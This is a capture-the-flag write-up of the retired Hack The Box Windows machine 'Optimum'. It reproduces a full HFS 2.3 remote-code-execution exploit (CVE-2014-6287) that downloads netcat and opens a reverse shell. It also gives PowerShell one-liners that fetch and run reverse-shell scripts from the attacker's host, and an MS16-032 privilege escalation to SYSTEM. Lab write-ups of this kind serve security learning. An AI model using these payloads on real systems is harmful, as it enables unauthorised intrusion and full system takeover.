on hackthebox | optimum | windows | rejetto | null byte injection | powershell | ms16-032 | pentest

Hack The Box : Optimum (windows)

I'm starting a series of write-ups about the HTB retired machines. I have owned 33 machines until now, applying the most diverse techniques, some machines are so well elaborated that they are true masterpieces.

All this information can not be lost and I intend to share with you in detail what I have done to pwn the "best machines".

Enumeration

A basic port-scan and osscan w/ nmap revealed this:

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

Running (JUST GUESSING): Microsoft Windows 2012|7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows 7 (85%)

A Windows box running a HttpFileServer httpd 2.3 on port 80

Attack vector

There is a known RCE vulnerability on this service

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#           It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#           It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!


import urllib2  
import sys

try:  
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "10.10.15.169" #local IP address
    local_port = "3001" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:  
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

Analyzing xpl source code, we can see that it uses a null byte injection %00 on parameter search to escape the filter of the forbidden characters allowing us to script over HFS Language without restriction. 

http://10.10.10.8/?search=%00{YOUR_HFS_SCRIPT_HERE}

With the RCE it runs a VBS script locally that downloads your served nc.exe and spawn a reverse shell to you.

Ok, leave the script aside and let's do it all manually.

Null byte injection

We can confirm the injection on HFS Lang is working by sending a break command and analyzing the response..

Without null byte

With null byte

...using break it returns only 1802 bytes halting the script.

Remote code execution

This HFS lang allow us to execute commands on server-side using the exec

..to confirm the RCE we can try to send a ICMP Ping back to us. You can use tcpdump to filter only ICMP packets..

Attention

  • The system ENV variables are working, this is why i'm using full path C:\Windows\system32\ping.exe, and this path will vary on Windows versions.
  • Sometimes there's a firewall blocking ICMP packets. A good idea to contour this is to test reverse connection on TCP port 443 before discard this idea.

Reverse shell

Now we need a shell on this machine.. It's a windows machine, and we have Powershell enabled since Win2k8+Win7, so let's google for a good Powershell Reverse shell.

Nikhil SamratAshok Mittal wrote an awesome article about powershell shells and provided a collection of snippets here https://github.com/samratashok/nishang

Take his PowerShellTcp.ps1 and serve it locally w/ your Python SimpleHTTPServer.

Now we need to find a way to Download and Execute this Powershell script.

From a 32-bit PowerShell session, to launch a 64-bit PowerShell session, use:
C:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell.exe

From a 64-bit PowerShell session, to launch a 32-bit PowerShell session, use:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe

Source: http://www.madwithpowershell.com/2015/06/64-bit-vs-32-bit-powershell.html

To test if Powershell and HTTP reverse connections is working I use this one-liner, it emulates a *nix WGET

Using Win32 paths didn't get any response, but:

%00{.exec|+C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.15.169:3001/test', 'C:\windows\temp\test').}

Awesome, we have a Winx64 machine w/ Powershell downloading our scripts.

Now launch your local nc listener and use this snippet to load the remote .ps1 in memory and execute. 

%00{.exec|C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3002.}

Note, I passed my IP/Port as args on command-line..

Finally we got a kostas user shell and our user flag.

Privilege escalation

Now to priv-esc start enumerating all the information you can about the machine..

  • System version
  • Hot fixes applied
  • Users, grops, permissions
  • Running processes
  • Scheduled tasks
  • Routes, firewall state
  • Sysprep and Unattended config files..
  • Config files (cfg, config, ini)

..any information that might help you in priv-esc.

From systeminfo I some interesting machine information

Host Name:                 OPTIMUM  
OS Name:                   Microsoft Windows Server 2012 R2 Standard  
OS Version:                6.3.9600 N/A Build 9600  
OS Manufacturer:           Microsoft Corporation  
OS Configuration:          Standalone Server  
...
System Type:               x64-based PC  
...
Windows Directory:         C:\Windows  
System Directory:          C:\Windows\system32  
...
Domain:                    HTB  
Logon Server:              \\OPTIMUM  
Hotfix(s):                 31 Hotfix(s) Installed.  
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442

This is a Windows Server 2012 R2 box w/ some hot fixes applied, using wmic you can list detailed information of each one:

wmic qfe get Caption,Description,HotFixID,InstalledOn

Caption                                     Description      HotFixID   InstalledOn  
                                            Update           KB2959936  11/22/2014   
http://support.microsoft.com/?kbid=2896496  Update           KB2896496  11/22/2014  
http://support.microsoft.com/?kbid=2919355  Update           KB2919355  11/22/2014  
http://support.microsoft.com/?kbid=2920189  Security Update  KB2920189  11/22/2014  

...

Combinating w/ exploit.db you can try to figure out witch one is not applied to a known vulnerability that allows priv-esc.

But it's painful. Why not use an automated tool to do this work?

Windows exploit suggester

This is a Python script that uses your systeminfo dump to check missing hot fixes and list the possible vulnerabilities.

  • Download here Windows-Exploit-Suggester
  • Update w/ python windows-exploit-suggester.py --update
  • Feed it w/ your systeminfo dump python windows-exploit-suggester.py --database 2017-11-15-mssb.xls --systeminfo ../systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
...
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)

So, it listed a several possible exploits for priv-esc, but the MS16-032 caught my attention because it is exactly for Windows 2012 R2 64-bit, has a well known Powershell PoC also a Metasploit-framework module.

You can see this exploit in action here..

It is designed to execute locally and spawns a new cmd.exe w/ NT Authority\SYSTEM privilege. We do not have visual access to this machine and we will not be able to access this new cmd.exe.

Ok, we can enable a Remote Desktop or VLC connection to do this, but it sucks!

The solution I found was to modify the script to accept commands in the arguments and execute anything as NT Authority\SYSTEM instead of that new cmd.exe.

Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOUR_COMMAND_HERE"

Download ms16_032_intrd_mod.ps1 here: https://gist.github.com/intrd/6dda33f61dca560e6996d01c62203374

Using our user shell we can invoke the MS16-032 exploit and pass our reverse-shell one-liner as argument to get our NT Authority\SYSTEM spawned on another nc listener/port..

IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003"

Final note

I saw a lot of people suffering to get NT Authority\SYSTEM on this box @ hackthebox.eu, and the main reason is because it is dependent on having thread handle available on machine.

The people downloaded the exploit without understanding/modifying, run and keep spawning the local system-shell they did not have access N times until the thread handles were running out and the exploit did not work anymore.

The obvious recommendation in this case is to test your exploit locally in an environment you control. When it works reset the remote machine and run your exploit.

References